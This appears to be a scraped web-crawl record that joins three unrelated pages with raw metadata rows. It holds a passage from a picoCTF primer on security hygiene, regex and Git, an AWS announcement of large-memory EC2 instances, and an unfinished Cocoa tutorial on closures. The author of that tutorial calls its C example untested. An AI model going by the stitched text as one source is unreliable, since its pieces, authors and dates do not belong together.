it’s important to understand that you’re trusting the VPN provider with your data. If you’re working on a sensitive project, you may want to vet the VPN provider to ensure that they’re trustworthy. ### B.4. Authentication Hackers need to worry about their own security too! When using virtual services, along with a VPN, use strong passwords and multi-factor authentication whenever possible. That way, even if an adversary were to steal your password from one service, they would need others in order to impersonate you. If you pursue cybersecurity as a career, many people may be trusting you with their data. You should take this responsibility seriously, and protect your own accounts to avoid putting others at risk. Best practices change often, but current recommendations include using a password manager, and including a hardware token for authentication. When creating a password, consider using a passphrase instead, as these are generally easier to remember and harder to crack. ### B.5. IDEs IDEs, or Integrated Development Environments, are tools that help developers write code. They often include features like syntax highlighting, code completion, and debugging. Visual Studio Code is a popular IDE that’s available for Windows, Mac, and Linux. Due to it being open source, many developers are able to contribute plugins to extend its functionality for specific languages or use cases. An IDE can help hackers by making it easier to write code for scripts, read code from their targets, and by providing tools to help them understand what code is doing. ### B.6. Installations If you’re interested in installing a distro of Linux on your computer or on a virtual machine, it’s generally a good idea to start with a popular distro so that there are plenty of resources and people that may be able to help you. A popular distro for beginners is Ubuntu, and another among hackers is Kali. If you don’t want to install a distro, you can also use a live USB, which is a USB drive that you can boot from. This is a great way to try out a distro without installing it. Some, like Tails, are designed to use this feature to protect user privacy. ## Appendix C: Regular Expressions (Regex) ##### Jeffery John Regular expressions, or regex, are a way to search for patterns in text. For example, you can use regular expressions to look for email addresses in a document, or even a flag for a capture-the-flag challenge. Several programming languages, including Python, have built-in support for regular expressions. ### C.1. Common Use Cases You’ve likely used regex before. For example, `grep` and `find` are two Unix commands that use regular expressions to search for files and text. For more about them, see our forensics section here. Some other common use cases for regular expressions include searching for: - URLs - Phone numbers - Dates - IP addresses - Passwords Regular expressions can also be used to validate, or check, a user’s input. For example, you may want to check that a user’s credit card number is in the correct format before allowing them to submit a form. This can also be useful for replacing or removing a string from a document. For example, you may want to remove all instances of a certain word, or perhaps prevent an attacker from submitting a form with malicious code. ### C.2. Basic Syntax Regex can be difficult to understand at a glance, as it is meant for describing patterns, not just simple strings. A regex pattern is a sequence of characters that define a search. The regex `xyz` would match the string 'xyz', but not 'xy' or 'xzy'. This can be expanded to include more complex patterns. For example, `x..` or `x.*y.*z`` would also match 'xyz', but also 'xab' or 'x123y456z'. Much of our data is structured in a way that can be described by regular expressions. Email address often include the '@' symbol and a domain address, and credit card numbers often follow rules based on their issuer. Even our picoCTF flags are often in the format picoCTF{}, which could be described by regex as `picoCTF\{.{1,15}\}` . #### C.2.1. Literal & Meta characters Literal characters are the simplest pattern. They are characters that must be present. Like in our earlier example, the regex `xyz` could only match the string 'xyz'. Metacharacters have special rules. For example, the period `.` can match any character. The asterisk `*` can match match zero or more of the character before it. Additionally, the plus `+` can match one or more of the character before it, and the question mark `?` can match zero or one of the character before it. These can be combined to create even more complex patterns. While they sound very similar, a single character can make a big difference in the information you can find! #### C.2.2. Escaping Special Characters Just like in many programming languages, you can use a backslash `\` to escape a special character. For example, if you want to match a period, you would use `\.` . This prevents the period from being treated as a metacharacter, which would lead to your regex matching any character, not just a period. #### C.2.3. Character Classes Character classes are a way to find a set. The regex `[xyz]` would match any of the characters 'x', 'y', or 'z', but not necessarily need to match all of them. This can be expanded to include ranges, like `[a-z]` or `[0-9]` . ### C.3. Anchors Anchors can match the start (`^` ) or end (`$` ) of a string. This can be helpful if you aren’t sure what the rest of the string looks like, but you know part of the pattern. ### C.4. Regex in Python We covered Python in our earlier chapters, which includes built-in support for regular expressions. By importing the `re` module, you can create and test regex in your code. As an example: ``` import re pattern = 'hello, *' string = 'hello, world!' match = re.search(pattern, string) if match: print('Match found!') else: print('No match found.') ``` This would print 'Match found!', as the pattern 'hello, *' matches the string 'hello, world!'. It would also return a match if the string included your name, like 'hello, reader!'. Throughout this Primer, we’ll share examples from other coding languages as well. Regex is a very helpful tool, and so it is nice to be able to use it in many different environments, depending on what is available and your comfort level. You might see regex for helping with a database query, website, or even a CTF challenge! ## Appendix D: Git & Version Control ##### Jeffery John As you progress through more and more cyber challenges, you may find yourself with quite the collection of files! You may also find that you want to try multiple approaches while solving a problem, or work with a team. Using version control, such as Git, can save you a lot of time and effort. Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. https://git-scm.com Version control is a way for developers to 'time-travel' by allowing them to save their files and return to them at any point. For example, you may start making changes to your Python code, and find that suddenly it doesn’t work anymore! Git would allow you to go back to a version of your code that does work. When working with teams of programmers or hackers, version control allows you to compare differences, or diffs, of each file and then 'merge' your progress together. This way, multiple people can work on the same problem without undoing each other’s progress! Along with Git, other Version Control Systems (VCS) include Subversion (SVN), Sapling, and Piper. Many large companies will develop or modify their VCS to fit their needs, though the basic principles remain the same. With tens of thousands of employees working on the same projects, some form of version control is a necessity for professionals to get work done. Another term for VCS is Source Configuration Management (SCM). These terms can be used interchangeably. However, Git and GitHub are less similar. Git is a VCS or SCM, while GitHub is web-based platform for development and collaboration that uses Git. We’ll talk more about GitHub later in this chapter. You can get started with Git locally, on your computer, or remotely in the cloud like with the picoCTF webshell: ### D.1. 'Git' Started with Git To start using Git locally, make sure to download a copy for your operating system from their website: This has already been done for you in the picoCTF webshell, and can be verified by typing `git --version` . `$ git --version` Using a VCS takes some practice with the shell. If you feel a bit lost, you may want to touch up with our chapter on using one. Once inside a shell with Git installed, you can start, or initialize a repository with `git init` . This will start 'tracking' all the files in your current folder. `$ git init` A repository, often abbreviated as a repo, is a collection of files. Version control works by 'tracking' changes to these files, and letting you undo or merge changes whenever you want. You can now tell Git who you are with `git config --global user.email "<your email>"` and `git config --global user.name "<your name>"` . ``` $ git config --global user.email "<your email>" $ git config --global user.name "<your name>" ``` Many video games have 'save' or 'check' points, where you can return to a point in the level if you need to. In Git, 'commits' act in a very similar way. You can add, or stage, all the files in your current folder with `git add .` , then commit them to be saved with `git commit -m "<your description>"` . ``` $ git add . $ git commit -m "<your description>" ``` Now, you can make any changes you want to the contents of your folder. You could add or delete files, or change lines of code. When you’re ready to go back in time, you can see your past commits with `git log` . By default, this will show the author, commit ID, time, and description. The commit ID will be a long series of letters and numbers. This is based on a 'hash' of your files. We’ll talk more about hashing later in this Primer with the cryptography chapter. By copying the commit ID, we can time travel back to that save point with `git checkout <commit ID>` . Pretty cool right? ``` $ git log $ git checkout <commit ID> ``` ### D.2. Branching You can also create multiple 'branches' of time with the `git branch <branch name>` command! You can see all local and remote branches with `git branch -a` , and switch between them with `git checkout <branch name>` . ``` $ git branch -a $ git checkout <branch name> ``` When you start a repository, you’ll be on the `main` branch. This may also be called the `trunk` or `boss` . If you’re working on an older repository, you may see it referred to as `master` . You can rename your `main` branch to whatever you’d like, but make sure that any collaborators know about the change. Creating multiple branches as you work is a very powerful way to keep track of what you’re working on. Each branch can have its own commit history. This can be especially useful for multiple people working together. It’s a good habit for each person to have their own branch, and for each new feature or problem to be worked on its own branch. When ready, a branch can be 'merged' or 'combined' with the branch you currently have checked out with the `git merge <branch name>` command. `$ git merge <branch name>` Above is an example of a branching structure. Each commit is numbered with a prefix 'C', and a branch has been created to work on a feature. 'C4' is a snapshot, or check point, of the most progress on the master, or main, branch. 'C5' with commit ID "iss53" is a snapshot of the most progress done for the feature. Note how 'C5' contains 'C0', 'C1', 'C2', and 'C3' while 'C4' only contains 'C0', 'C1', and 'C2'. When merging 'C5' into the main branch at 'C2', the commit history of 'C5' will be merged as well. If `$ git log` were to be run afterward, it would show a path from commit 'C4' to 'C5' to 'C3' to 'C2' to 'C1' and finally to the initial commit 'C0'. Time travel can be tricky! But by keeping careful track of commits and their common ancestors, we can branch and merge with confidence. ### D.3. Merging If you’re working with a 'remote' repository, such as one on GitHub, you can 'pull' or 'fetch' changes from the remote repository with `git pull` . This will download any changes from the remote repository and merge them with your current branch. This is known as 'fast-forwarding' because the changes are simply added to the end of your branch’s commit history. It’s important to do this regularly to avoid merge conflicts later! A merge conflict is when two branches have changes on the same line. This can happen when you’re working on your local machine or personal branch, and changes are made to the original file before you merge back in. Fetching the latest changes helps ensure that any differences are minimal. Ideally, conflicts can also be avoided by working on different files or different lines of code on each branch. However, if you do run into a merge conflict, Git will show you the difference between the file on each branch and ask what you’d like to keep. You can then use a text editor to delete the other change, or splice the changes together. The start of the conflict is marked with `<<<<<<< HEAD` , and the end of the conflict is marked with `>>>>>>> <branch name>` . Somewhere in the middle will be a `=======` which marks the division between the lines in each branch. It’ll be up to you to decide what to keep and what to delete. The markers from Git are just there to help you find the conflict, and can be deleted once you’re done. For example, if you had a file with the following contents: ``` $ cat example.txt This is a file to demonstrate merging. ``` And were working on two separate branches, one with the following changes: ``` $ git checkout cats $ cat example.txt Cats are very cute. ``` And another with the following changes: ``` $ git checkout dogs $ cat example.txt Dogs are very cute. ``` If you try to merge the two branches together, you’d get the following error: ``` $ git merge cats Auto-merging example.txt CONFLICT (content): Merge conflict in example.txt Automatic merge failed; fix conflicts and then commit the result. ``` This can be a scary message! But if you open the file, you’ll see the following: ``` $ cat example.txt This is a file to demonstrate merging. <<<<<<< HEAD Dogs are very cute. ======= Cats are very cute. >>>>>>> cats ``` The first line is the original file, and the second line is the change from the `dogs` branch. The third line is the change from the `cats` branch. To resolve this conflict, we’ll need to decide how to avoid example.txt from having two different lines in the same place. We could delete one of the lines, or combine them together. For example, we could change the file to the following: ``` $ cat example.txt This is a file to demonstrate merging. Dogs and cats are very cute. ``` Once you’ve chosen the changes that will continue through the merge, you can add and commit the file like normal, or use `git merge --continue` . You can also abort the merge with `git merge --abort` if you’d like to start over. One more useful tool is `git stash` which will save your current changes and allow you to return to them later with `git stash pop` . Afterward, your original branch will be updated with the changes from the other, merged branch. Great job! ### D.4. Pulling & Pushing After finishing your changes and pulling and merging with the main branch, you can 'push' your changes to be used by others, or yourself on a different device. If you’re working on a cloned copy, you can use `git push` to send your commits to their source, the remote repository. If you’re working with files you’ve created locally, you’ll need to create a remote repository to push to. This can be done with `git remote add origin <remote repository URL>` . You can then push your changes to the remote repository with `git push -u origin <branch name>` . ``` $ git push $ git remote add origin <remote repository URL> $ git push -u origin <branch name> ``` GitHub is a good tool to get comfortable with collaboration. 'Pull requests' are a way for maintainers of a project to review your work and can help catch any errors that slipped past what merge conflicts can catch. Sometimes, automated tests are run on the code as well to make sure it’s ready to go into production! As a hacker, you’ll want to work closely with your team to make sure everyone is using updated code, scripts, and programs as modifications are made to solve challenges. Be careful of forcing changes with the `-f` flag as this can overwrite any work that’s already been completed. ### D.5. Review of Git Operation | Shell example | Note | ---|---|---| See Git options | | Lists all the available commands and options for Git. | Start a repository | | 'Initialize' your current folder into a 'repository' where files and file changes can be tracked. | Stage a file | | 'Staging' a file means it will be added to your next commit. | Commit file(s) | | 'Commit' your files to be saved. It’s a good habit to write short, helpful commit messages so that you and others can find your work easily later. | See past commits | | See past 'save points' and their commit IDs so you can go back to them. | Go to a past commit | | Return the repository to a past commit. | Combine commits together | | Combine the work on different branches together. Be careful of merge conflicts! You’ll be prompted to choose which work should be brought forward. | Create a new branch | | Create a new 'branch' of time. This new branch will start with the commit history of its parent branch, but once checked out, future commits will stay on that branch until merged. | Go to a new branch | | Like checking out a commit, this will return or forward your repository to the contents of the branch. Time travel! | Pull a repository | | Create or update a copy of a repository in your development environment. | Push a repository | | Send your updates back to the remote repository so that you and/or others can access them. If your local branch has no remote equivalent, you’ll be asked to specify where your commits should be sent. | If you want more practice, I (Jeffery), recommend *Oh My Git!*, an open source game with interactive visualizations and commands. ### D.6. Using GitHub GitHub has many features on top of Git to help when writing code and working with files. For example, while it’s important to be comfortable with the shell when working with Git and when hacking, GitHub provides a Desktop client that can be a convenient GUI for common workflows. They also have a mobile app, cloud dev environments, and automated security scans. As a student, a great place to start is the GitHub Student Developer Pack, which offers many free resources and further tutorials. As a collaboration tool, GitHub allows you to create public 'open source' repositories and join discussions or contribute code to others. You can even find the code for picoCTF and add to this primer! https://github.com/picoCTF Many open source repositories will include a CONTRIBUTING.md file that discusses what help they’re looking for. More discussion and best practices for the open source community can be found at https://opensource.guide Just make sure, as a hacker and competitor, that you’re allowed to publish what you’re working on to a public repository! Many competitons, including picoCTF, ask that files related to competition are kept secret for some time in order to ensure fairness. Check public repositories for licenses as well, which will detail how their code can be used. We hope you join our community! ## Appendix E: Tools ##### Jeffery John Throughout this Primer, we’ve recommended a number of tools to help you get started with hacking. Here they are, all in one place! ### E.1. General - picoCTF Webshell: https://webshell.picoctf.org - Git: https://git-scm.com ### E.2. Forensics - The Sleuth Kit: https://www.sleuthkit.org/sleuthkit - Wireshark: https://www.wireshark.org - ASCII Table: https://www.asciitable.com - Pwntools: http://docs.pwntools.com/en/stable ### E.3. Web Exploitation - W3 Schools: https://www.w3schools.com - Burp Suite: https://portswigger.net/burp ### E.4. Cryptography - Vigenère Cracking Tool: https://www.simonsingh.net/The_Black_Chamber/vigenere_cracking_tool.html - Extended Euclidean algorithm: https://planetcalc.com/3298 - Integer factorization calculator: https://www.alpertron.com.ar/ECM.HTM ### E.5. Databases ### E.6. Assembly ### E.7. Git - Git: https://git-scm.com - Git Cheat Sheet: https://education.github.com/git-cheat-sheet-education.pdf - Oh My Git!: https://ohmygit.org - GitHub: https://github.com
true
true
true
null
2024-10-12 00:00:00
2024-07-25 00:00:00
null
null
null
null
null
null
21,193,421
https://aws.amazon.com/blogs/aws/ec2-high-memory-update-new-18-tb-and-24-tb-instances/
EC2 High Memory Update – New 18 TB and 24 TB Instances | Amazon Web Services
null
## AWS News Blog # EC2 High Memory Update – New 18 TB and 24 TB Instances | Last year we launched EC2 High Memory Instances with 6, 9, and 12 TiB of memory. Our customers use these instances to run large-scale SAP HANA installations, while also taking advantage of AWS services such as Amazon Elastic Block Store (Amazon EBS), Amazon Simple Storage Service (Amazon S3), AWS Identity and Access Management (IAM), Amazon CloudWatch, and AWS Config. Customers appreciate that these instances use the same AMIs and management tools as their other EC2 instances, and use them to build production systems that provide enterprise-grade data protection and business continuity. These are bare metal instances that can be run in a Virtual Private Cloud (VPC), and are EBS-Optimized by default. Today we are launching instances with 18 TiB and 24 TiB of memory. These are 8-socket instances powered by 2nd generation Intel® Xeon® Scalable (Cascade Lake) processors running at 2.7 GHz, and are available today in the US East (N. Virginia) Region, with more to come. Just like the existing 6, 9, and 12 TiB bare metal instances, the 18 and 24 TiB instances are available in Dedicated Host form with a Three Year Reservation. You also have the option to upgrade a reservation for a smaller size to one of the new sizes. Here are the specs: Instance Name | Memory | Logical Processors | Dedicated EBS Bandwidth | Network Bandwidth | SAP Workload Certifications | u-6tb1.metal | 6 TiB | 448 | 14 Gbps | 25 Gbps | OLAP, OLTP | u-9tb1.metal | 9 TiB | 448 | 14 Gbps | 25 Gbps | OLAP, OLTP | u-12tb1.metal | 12 TiB | 448 | 14 Gbps | 25 Gbps | OLAP, OLTP | u-18tb1.metal | 18 TiB | 448 | 28 Gbps | 100 Gbps | OLAP, OLTP | u-24tb1.metal | 24 TiB | 448 | 28 Gbps | 100 Gbps | OLTP | SAP OLAP workloads include SAP BW/4HANA, BW on HANA (BWoH), and Datamart. SAP OLTP workloads include S/4HANA and Suite on HANA (SoH). Consult the SAP Hardware Directory for more information on the workload certifications. With 28 Gbps of dedicated EBS bandwidth, the **u-18tb1.metal** and **u-24tb1.metal** instances can load data into memory at very high speed. For example, my colleagues loaded 9 TB of data in just 45 minutes, an effective rate of 3.4 gigabytes per second (GBps): Here’s an overview of the scale-up and scale-out options that are possible when using these new instances to run SAP HANA: **New Instances in Action** My colleagues were kind enough to supply me with some screen shots from 18 TiB and 24 TiB High Memory instances. Here’s the output from the `lscpu` and `free` commands on an 18 TiB instance: Here’s `top` on the same instance: And here is HANA Studio on a 24 TiB instance: **Available Now** As I mentioned earlier, the new instance sizes are available today. — Jeff; PS – Be sure to check out the AWS Quick Start for SAP HANA and the AWS Quick Start for S/4HANA.
true
true
true
Last year we launched EC2 High Memory Instances with 6, 9, and 12 TiB of memory. Our customers use these instances to run large-scale SAP HANA installations, while also taking advantage of AWS services such as Amazon Elastic Block Store (Amazon EBS), Amazon Simple Storage Service (Amazon S3), AWS Identity and Access Management (IAM), Amazon […]
2024-10-12 00:00:00
2019-10-08 00:00:00
https://d2908q01vomqb2.c…ap_options_4.png
article
amazon.com
Amazon Web Services
null
null
2,042,410
http://blog.yafla.com/The_Biggest_Lie_That_Ever_Was_Told/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
39,155,594
https://www.bbc.com/future/article/20240122-california-signs-cursive-writing-into-law-what-are-the-brain-benefits
California signs cursive writing into law – what are the brain benefits?
Nafeesah Allen
# California signs cursive writing into law – what are the brain benefits? **From the start of 2024, the state of California reinstated the requirement that first through sixth graders in public schools learn to write in cursive.** The handwriting technique stopped being taught in the Golden State in 2010, but now California re-joins nearly two dozen US states that have made cursive education mandatory in some form. While cursive – also known as joined italics – was momentarily thought of as a dying art in the US, the move by California has reignited debates in both educational and scientific circles about the real value of learning this writing style, the global implications of letting it go and questions about its potential brain benefits. California-based neuroscientist Claudia Aguirre says "more and more neuroscience research is supporting the idea that writing out letters in cursive, especially in comparison to typewriting, can activate specific neural pathways that facilitate and optimise overall learning and language development." Kelsey Voltz-Poremba, assistant professor of occupational therapy at the University of Pittsburgh, adds that young children may even find cursive easier to learn and replicate. "When handwriting is more autonomous for a child, it allows them to put more cognitive energy towards more advanced visual-motor skills and have better learning outcomes," she says. **So why isn't everyone on the cursive bandwagon?** There are a lot of reasons why cursive hasn't been mandated by all schools. While the benefits of manual handwriting are clear, the literature differs on whether cursive specifically is better than print for child development. Karin James, professor of psychological and brain sciences at Indiana University, works with four-to-six-year-olds in her research, which focuses on print over cursive. Her research found that learning letters through writing by hand activates networks in the brain that are not activated by typing on a keyboard, including an area known to play a role in reading. Other research by Virginia Berninger, a professor in educational psychology at the University of Washington, has also shown that cursive, print writing and typing use related but different brain functions. Yet, cursive instruction for very young pupils is becoming more rare. Also, cursive instruction in the US isn’t standardised across all school districts or even across instructors. The inconsistency presents a unique challenge for teachers. "Nearly two dozen states have added a requirement for cursive handwriting instruction for grades three to five into their state educational standards," says Kathleen S. Wright, the founder and executive director of The Handwriting Collaborative, an educational organization that teaches best-practice approaches to classroom handwriting instruction. "However, this is not a requirement that is enforced or funded, so instruction in all forms of handwriting is not consistently addressed." California's teachers will have to figure out how best to integrate cursive into classrooms that didn't previously require it, but any pivot away from screens could be beneficial. "In our community-based handwriting program for school-aged youth at the University of Pittsburgh, we consistently have parents complaining their child is struggling in school and that they haven't been taught how to write because they mostly use their computer or [a] similar device," says Voltz-Poremba. The movements needed for typing are the same no matter what letter is being typed, she says, so children are robbed of the chance to develop sensory processing skills that come from forming and understanding letters. Perhaps the boomerang is turning back in the other direction simply because of the time we live in: post-pandemic, many children use a laptop or tablet for schoolwork, but a return to in-person classes shows that many US students display an over-reliance on screens. **Are American children going to be left behind?** Although the link between penmanship and reading achievement is not necessarily causal, some educators fear that letting go of cursive could spell a US backslide in educational outcomes. One small study by Italian researchers found that teaching cursive to pupils in the first year of primary school could improve their reading skills. Canada also tried to do away with cursive, only to resurrect it in 2023. Last year, the Ontario Ministry of Education reinstated its cursive handwriting instruction requirement. Educators remain curious about any lessons Ontario has learned about how best to give that instruction, how long lessons should last and how frequently practise should be introduced. Comparing the Organization of Economic Cooperation and Development (OECD) Programme for International Student Assessment (PISA)’s 2022 global rankings for reading achievement of 15 year olds by country, the US was ninth. American students trailed behind Science, Technology, Engineering, and Math (STEM) powerhouses such as Singapore, which was in the top spot, and Japan at number three. Cursive writing is still widely taught in Western Europe. Spain, Italy, Portugal, and France have held onto the tradition. And in the UK, joined-up handwriting is still taught in English classrooms. The UK government’s Ofsted research review states that "the national curriculum requires children to learn unjoined handwriting before they 'start using some of the diagonal and horizontal strokes that are needed to join letters'". Meanwhile, Switzerland only teaches basic script and, in 2016, Finland removed cursive handwriting from its schools too. With no global precedent one way or the other, school districts and ministries of education around the world vary widely from region to region. **Is cursive worth losing?** For all the unknowns, the evidence suggests that there is no downside to learning cursive. Research into the differences between handwriting vs. typing shows that it is still beneficial to write with pen and paper – but the greatest benefits (to memory and learning words, for example) are tied to the act of writing itself, not cursive over print. The only possible drawback is in perception. Handwriting is all too often pitted against keyboarding as a zero-sum game, which is not a fair proposition. Much like the debate over how much time kids need at recess, educators don't have to completely discontinue one learning activity in favour of an equally important one. Instead, Voltz-Poremba expounds a glass-half-full approach. "It's important to find a balance to ensure today's youth are prepared with the skills that are gained without the use of technology," she says. -- *If you liked this story, sign up for **The Essential List newsletter** – a handpicked selection of features, videos and can't-miss news delivered to your inbox every Friday.*
true
true
true
A new law requiring cursive to be taught in California schools went into effect at the start of this year. But does this style of handwriting have long to live on a global scale?
2024-10-12 00:00:00
2024-01-22 00:00:00
https://ychef.files.bbci…351/p0h5lfnf.jpg
newsarticle
bbc.com
BBC
null
null
30,896,721
https://tribunemag.co.uk/2019/01/abolish-silicon-valley
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
8,705,257
http://online.wsj.com/articles/what-could-be-lost-as-einsteins-papers-go-online-1417790386
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
7,336,057
http://phys.org/news/2014-03-photon-enables-quantum-mechanical-state.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
703,160
http://globaleconomicanalysis.blogspot.com/2009/07/housing-update-how-far-to-bottom.html
Housing Update - How Far To The Bottom?
null
### Housing Update - How Far To The Bottom? ### Mish Moved to MishTalk.Com Click to Visit. Inquiring minds have been asking for another housing update. Using the Japan Nationwide Land Prices model as my guide, here is how I have called things in real time. click on chart for sharper image My previous update was was on December 1 ,2008 in a post with the same name as this one Housing Update - How Far To The Bottom? I just added the Summer 2009 arrow. Housing prices are now one notch closer to their final destination. The US Timeline scale is compressed. At the current pace, housing will take about years total to bottom vs. 14 years in Japan. Comparison to Case-Shiller Inquiring minds may wish to compare the shape of the above chart to June 209 Case Shiller Release (April Data). click on chart for sharper image The chart above shows the index levels for the 10-City and 20-City Composite Indices. As of April 2009, average home prices across the United States are at similar levels to where they were in the middle of 2003. From the peak in the second quarter of 2006, the 10-City Composite is down 33.6% and the 20-City Composite is down 32.6%. click on chart for sharper image The chart above depicts the annual returns of the 10-City Composite and the 20-City Composite Home Price Indices. The 10-City and 20-City Composites declined 18.0% and 18.1%, respectively, in April compared to the same month in 2008. These are improvements over their returns reported for March, down 18.7% for both indices. For the past three months, the 10-City and 20-City Composites have recorded an improvement in annual returns. Record annual declines were reported for both indices with their respective January data, -19.4% for the 10-City Composite and -19.0% for the 20-City Composite. “The pace of decline in residential real estate slowed in April,” says David M. Blitzer, Chairman of the Index Committee at Standard & Poor’s. “In addition to the 10-City and 20-City Composites, 13 of the 20 metro areas also saw improvement in their annual return compared to that of March. Furthermore, every metro area, except for Charlotte, recorded an improvement in monthly returns over March. While one month’s data cannot determine if a turnaround has begun; it seems that some stabilization may be appearing in some of the regions. We are entering the seasonally strong period in the housing market, so it will take some time to determine if a recovery is really here. Flashback March 26 2005 The initial data point was established in the post It's a Totally New Paradigm on March 26, 2005. Here are some excerpts from that post. - Ron Shuffield, president of Esslinger-Wooten-Maxwell Realtors says that "South Florida is working off of a totally new economic model than any of us have ever experienced in the past." He predicts that a limited supply of land coupled with demand from baby boomers and foreigners will prolong the boom indefinitely. - "I just don't think we have what it takes to prick the bubble," said Diane C. Swonk, chief economist at Mesirow Financial in Chicago, who was an optimist during the 90's. "I don't think prices are going to fall, and I don't think they're even going to be flat." - Gregory J. Heym, the chief economist at Brown Harris Stevens, is not sold on the inevitability of a downturn. He bases his confidence in the market on things like continuing low mortgage rates, high Wall Street bonuses and the tax benefits of home ownership. "It is a new paradigm" he said. Inquiring minds may wish to review Bernanke: There's No Housing Bubble to Go Bust. Ben S. Bernanke does not think the national housing boom is a bubble that is about to burst, he indicated to Congress last week, just a few days before President Bush nominated him to become the next chairman of the Federal Reserve.Flashback February 12, 2008 U.S. house prices have risen by nearly 25 percent over the past two years, noted Bernanke, currently chairman of the president's Council of Economic Advisers, in testimony to Congress's Joint Economic Committee. But these increases, he said, "largely reflect strong economic fundamentals," such as strong growth in jobs, incomes and the number of new households. Bernanke Expects Housing Recovery by Year End Federal Reserve Chairman Ben Bernanke told lawmakers Tuesday he expects the downtrodden U.S. housing sector to improve by the end of the year, a senator who participated in the closed-door meeting said.Here are my thoughts from October 24, 2007 in Housing - The Worst Is Yet To Come. "He let us believe that the housing situation should begin to ameliorate by the end of the year," said Sen. Pete Domenici, a New Mexico Republican, told reporters. "He gave a very good, succinct, short overview of where he thought the economy was right now and how it might move forward," said Sen. Jon Kyl of Arizona. Subprime resets peak this year but Alt-A problems which are just as big do not peak until 2011. In addition, the overall economy is slowing dramatically. There is going to be consumer led recession to deal with.Please consider When Will Housing Bottom? for additional charts and details. Unemployment has bottomed this cycle and is bound to rise dramatically. That will further pressure housing prices in a very significant way. The worst (by a long shot) is yet to come. Remind me to start looking for a true bottom in 2011-2012. Perhaps we get a bounce somewhere along the way. Housing Decline Fat Tails The Case-Shiller charts suggest that the worst may finally be over. However, so far all we can say is that things are getting worse at a decreasing pace. This is not the same as getting better. Indeed it may take 2 years or more to cross the zero-line in the second Case-Shiller chart. That would be consistent with a bottom in 2011. Thus I see no reason to switch from my long-held estimate of a 2011-2012 timeframe for a bottom. Furthermore, even once housing does bottom, do not expect a V shaped recovery. Housing prices are likely to remain weak especially in real (inflation adjusted) terms for another decade. For a clue as what to expect, take a look at the period from 1991 to 2000 in the first Case-Shiller chart. Expect a similarly long "fat tail" once housing does bottom. If you are a believer in hyperinflation, then housing is a "sure thing". Indeed it was a "sure thing" last year and 5 years ago as well and we know how that turned out. Looking ahead, hyperinflation beliefs might still be very costly given the charts, history, and economic fundamentals suggest no such thing. Mike "Mish" Shedlock http://globaleconomicanalysis.blogspot.com Click Here To Scroll Thru My Recent Post List Disclaimer:The content on this site is provided as general information only and should not be taken as investment advice. All site content, including advertisements, shall not be construed as a recommendation to buy or sell any security or financial instrument, or to participate in any particular trading or investment strategy. The ideas expressed on this site are solely the opinions of the author(s) and do not necessarily represent the opinions of sponsors or firms affiliated with the author(s). The author may or may not have a position in any company or advertiser referenced above. Any action that you take as a result of information, analysis, or advertisement on this site is ultimately your responsibility. Consult your investment adviser before making any investment decisions.
true
true
true
Inquiring minds have been asking for another housing update. Using the Japan Nationwide Land Prices model as my guide, here is how I have ca...
2024-10-12 00:00:00
2009-07-13 00:00:00
https://blogger.googleus…gb-176-10-10.png
null
blogspot.com
globaleconomicanalysis.blogspot.com
null
null
292,727
http://www.macresearch.org/cocoa-scientists-part-xxvii-getting-closure-objective-c
Cocoa for Scientists (Part XXVII): Getting Closure with Objective-C - MacResearch.org
Martina Nikolova
Last week, Chris Lattner — who manages the Clang, LLVM, and GCC groups at Apple — announced that work was well underway to bring ‘blocks’ to the GCC and Clang compilers. ‘So what?’, I hear you ask, ‘My kid has been using blocks since he was 9 months old.’ Fair point, but maybe not *these* blocks. Table of Contents ### A Demonstration of ‘Blocks’ Blocks, or *closures* as they are often called, have existed in other languages for quite some time. Ruby, for instance, is famous for them. They also exist in Python, which I’ll use here to demonstrate the principle. Take this Python code ``` def EvalFuncOnGrid(f, forceConst): for i in range(5): x = i*0.1 print x, f(forceConst, x) def QuadraticFunc(forceConst, x): return 0.5 * forceConst * x * x def Caller(): forceConst = 3.445 EvalFuncOnGrid(QuadraticFunc, forceConst) Caller() ``` This simple program begins with a call to the `Caller` function. The `Caller` function calls to the `EvalFuncOnGrid` function to evaluate the function passed, in this case `QuadraticFunc` , which represents a simple quadratic function. The result is the value of the quadratic function on a grid of points. ``` 0.0 0.0 0.1 0.017225 0.2 0.0689 0.3 0.155025 0.4 0.2756 ``` Unquestionably exciting stuff, but what I want to draw attention to is the extra data that was passed along with the function itself. The `QuadraticFunc` function takes two arguments: the coordinate (x), and a force constant. This force constant needs to be passed along with function, because the function itself has no way to store it. This may not seem like a big deal, but suppose now we want to reuse `EvalFuncOnGrid` to print values of a different type of function, one that does not have a force constant, and instead takes a wave number parameter. Hopefully you can see that passing ‘state’ for the function, in the form of data and parameters, is limiting the flexibility of our code. One viable solution would be to make `QuadraticFunc` a class, but that is a bit heavy-handed. Besides, this solution would work for our own functions, but not for built-in functions, or functions from libraries. We need some way to pass state to `EvalFuncOnGrid` , so that it can use that state when evaluating the function. This is exactly what ‘blocks’ allow us to do. Here is the Python code rewritten to use a block: ``` def EvalFuncOnGrid(f): for i in range(5): x = i*0.1 print x, f(x) def Caller(): const = 3.445 def QuadraticFunc(x): return 0.5 * const * x * x EvalFuncOnGrid(QuadraticFunc) Caller() ``` If you run it, you will find this code produces the same output as before. So what’s changed? You’ll note that the force constant has been removed from all argument lists, and no reference is made to it at all in `EvalFuncOnGrid` . This was a key objective: to have `EvalFuncOnGrid` be completely general, and work with any function. But the force constant must still be there, otherwise how does the quadratic function get evaluated? You will have noticed that the `QuadraticFunc` function has been moved into the `Caller` function. The effect of this is that `QuadraticFunc` gets a copy of the stack of `Caller` , that is, it ‘inherits’ any variables and constants that are set in `Caller` . Because `const` is set, `QuadraticFunc` copies its value to its own stack, and can access it later in `EvalFuncOnGrid` . This is the essence of blocks: it is similar to passing a function argument, with the difference that the block has a copy of the stack from the scope where it was defined. ### Blocks in Objective-C Chris Lattner’s announcement details how blocks will be used in C and Objective-C, and — in essence — it is similar to the Python example above. Here is that example rewritten in the new C syntax: ``` void EvalFuncOnGrid( float(^block)(float) ) { int i; for ( i = 0; i < 5 ; ++i ) { float x = i * 0.1; printf("%f %f", x, block(x)); } } void Caller(void) { float forceConst = 3.445; EvalFuncOnGrid(^(float x){ return 0.5 * forceConst * x * x; }); } void main(void) { Caller(); } ``` (I’m not sure if this is 100% correct, because I haven’t tried to compile it yet, but it should at least give you the idea.) The block syntax in C is very similar to the standard syntax for function 